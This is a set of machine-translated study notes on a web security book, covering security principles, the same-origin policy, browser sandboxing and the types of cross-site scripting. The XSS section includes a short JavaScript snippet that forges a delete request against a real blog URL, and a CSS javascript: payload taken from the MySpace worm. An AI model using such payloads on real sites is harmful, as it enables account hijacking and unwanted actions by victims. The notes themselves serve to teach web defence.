White hat speaks web security 1.pdf

Chapter I security Worldview

Security is an ongoing process

6 Threats: Spoofing (camouflage), tampering (tamper), repudiation (repudiation), informationdisclosure (information leakage), denial of service (denial of service), elevation of Privilege (elevation of privilege)

An excellent security solution requires:

Solve problems effectively

User experience is good

Performance

Low coupling

Easy to upgrade and extend

Security Policy

Secure by default principle (least privilege principle): Whitelist can be used and banned blacklist, the former limits the scope of greater and more secure

Defense in Depth principle (defense in depth): In all respects, each depth forms a holistic and effective defense

Data and code separation principles: You should be aware of the boundaries of code and data, and use user data as code execution to cause security issues

Chapter II Browser Security

Same-origin policy: Restrict "document" from a different source to read or set certain properties on the current document

Browser proposed "origin" concept, the impact of the "source" factors are: Host (domain name or IP address, if the IP address is considered a root domain name), sub-domain name, port, protocol, in the browser <script>, , < Iframe>, <link> and other tags can load resources across domains, not subject to the same-origin policy, when the label with "src" attribute is loaded, it is actually a GET request initiated by the browser, unlike XMLHttpRequest, which is loaded by the SRC attribute, The browser restricts JavaScript permissions so that it cannot read and write what is returned in it

For the browser, in addition to the DOM, cookies, XMLHttpRequest by the same policy restrictions, some loaded third-party plug-ins Flash, Google gears, etc. have their own control strategy

Browser to take a multi-process architecture, Google chrome will be the main process divided into browser process, rendering process, plug-in process, the expansion process, each process is isolated from each other, do not affect

IE8 also takes a multi-process architecture, each tab page is a process

Sandbox is a sandbox, now refers to the "Resource Isolation class module" synonymous, sandbox designed to allow untrusted code to run in a certain environment, restricting code access to outside the quarantine code, or through a certain data channel (encapsulated API)

The benefit of a multi-process architecture over a single-process architecture is that other processes will not be affected when a crash occurs

Malicious URL blocker: The browser periodically gets a list of malicious URLs from the server, and a warning page pops up when visiting these URLs

Chapter III Cross-site scripting attacks (XSS)

Cross-site scripting attacks, the full name of the crossing site script, in order to distinguish it from CSS (cascading Style Sheet), called XSS

Depending on the effect, XSS can be divided into the following categories

Reflective XSS: simply "reflects" the user input data to the browser, hackers often need to persuade users to "click" a malicious link to attack success, also known as "non-persistent XSS"

Storage-type XSS: The user input data "storage" on the server side, a strong stability, such as a blog contains malicious code, all users who visit the blog will execute this malicious code in the browser, also known as "persistent XSS"

DOM Based XSS: This type is not divided according to "data is saved on the server side", it is also reflective XSS from the effect, by modifying the page's DOM node formed by the XSS (through the closing of the label,//commented out after the content, intermediate insert <script> ）

Advanced XSS Attack

The attacker has implanted malicious scripts into the page, known as "XSS Payload", and the common XSS Payload is to initiate a "cookie hijacking" attack by reading the browser's cookie object, which generally encrypts the current user's login credentials, Attackers can log in to the user's account without a password, and in later chapters, the cookie defense

Constructs a GET and POST request: If an XSS vulnerability exists on a page in the domain of the Sohu blog, a GET request can be initiated from a single picture

var img=document.createelement ("img");

Img.src= "http://blog.sohu.com/manage/entry.do?m=delete&id=156713012";

Document.body.appendChild (IMG);

Just let the blogger execute this JavaScript code to delete this article

XSS code can also simulate a browser sending a GET, POST request

For example, get QQ mailbox SID encoded after simulating browser request

Identifying User-side information

In IE, you can determine whether the classid of the ActiveX control is present or not and whether the software is installed by the user, and then choose the appropriate browser vulnerability to Trojan Horse (The following example detects if the Thunderbolt software is installed)

Third-party software may leak some information, such as Flash has a System.capabilities object, able to query the client computer hardware information

The Firefox plug-in (Plugins) list is stored in a DOM object and can be traversed by querying the DOM for all plug-in Navigator.plugins objects

The ability of the user Ip:javascript itself not to acquire the local IP address, XSS can be done with third-party software, such as the Java environment installed on the client, XSS can get the client's local IP address by invoking the Java applet interface

A security researcher encapsulates the XSS payload function as an XSS attack platform, primarily to demonstrate the dangers of XSS

Attack API

BeEF

Xss-proxy

Ultimate Weapon: XSS Worm

In 2005, the 19-year-old Samy Kamkar launched an XSS worm attack on myspace.com, when MySpace filtered through a lot of dangerous HTML tags, preserving only <a><div> such as the security label, all events such as "onclick" are also filtered, but allow CSS, such as

<div style= "Background:url (' Javascript:alert (1) ')" >

Avoid JavaScript's sensitive words by splitting

In general, there is a storage type of XSS, more prone to initiate XSS worm attacks